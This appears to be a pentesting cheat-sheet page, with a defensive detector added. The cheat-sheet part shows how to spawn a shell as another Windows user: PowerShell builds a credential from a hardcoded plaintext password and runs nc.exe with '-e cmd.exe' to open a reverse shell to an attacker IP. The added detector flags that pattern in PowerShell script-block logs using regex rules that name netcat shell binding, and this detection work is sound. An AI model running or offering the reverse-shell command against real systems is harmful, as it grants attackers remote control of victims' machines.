Spawn Shell as a different user

  • Start a netcat listener on your attacking machine.

  • Upload the nc.exe binary to the victim.

  • Run the PowerShell commands below to connect back to your nc listener as the other user.

$username = 'alice'

$password = 'aliceishere'

$securePassword = ConvertTo-SecureString $password -AsPlainText -Force

$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword

Start-Process nc.exe -ArgumentList "-e C:\Windows\System32\cmd.exe 10.11.0.76 9002" -Credential $credential
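
From the defender's side, the sequence above leaves a recognizable pattern in PowerShell script block logs (Event ID 4104). The following is an added example, not part of the original page, that matches that pattern over constructed sample script text; the function name `Test-PlaintextCredentialSpawn`, the finding labels and the two-indicator threshold are assumptions made for illustration.

```powershell
# Added example: flag script text that builds a credential from a plaintext
# password and launches a process under it. All sample records are constructed.
function Test-PlaintextCredentialSpawn {
    param([Parameter(Mandatory)][string]$ScriptText)

    $findings = @()
    # Plaintext password converted in-line to a SecureString
    if ($ScriptText -match 'ConvertTo-SecureString\b[^\r\n]*-AsPlainText') {
        $findings += 'plaintext-to-securestring'
    }
    # Start-Process (or its aliases saps/start) run with alternate credentials
    if ($ScriptText -match '\b(Start-Process|saps|start)\b[^\r\n]*-Credential\b') {
        $findings += 'process-with-alternate-credential'
    }
    # netcat-style "-e <shell>" argument that hands an interpreter to a socket
    if ($ScriptText -match '(?<!\w)-e\s+\S*(cmd|powershell)(\.exe)?\b') {
        $findings += 'shell-bound-to-network-tool'
    }
    [pscustomobject]@{
        Suspicious = ($findings.Count -ge 2)   # assumed threshold: two indicators
        Findings   = $findings -join ','
    }
}

# Constructed samples: the sequence from this page, then a benign command.
$samples = @(
    @'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process nc.exe -ArgumentList "-e C:\Windows\System32\cmd.exe 10.11.0.76 9002" -Credential $credential
'@,
    'gci -recurse . | select fullname'
)

foreach ($s in $samples) {
    Test-PlaintextCredentialSpawn -ScriptText $s
}

# On a host with script block logging enabled, the same check can be fed real events:
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { Test-PlaintextCredentialSpawn -ScriptText $_.Message }
```

The first sample trips all three indicators and is flagged; the second produces no findings.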

View all files recursively

gci -recurse . | select fullname
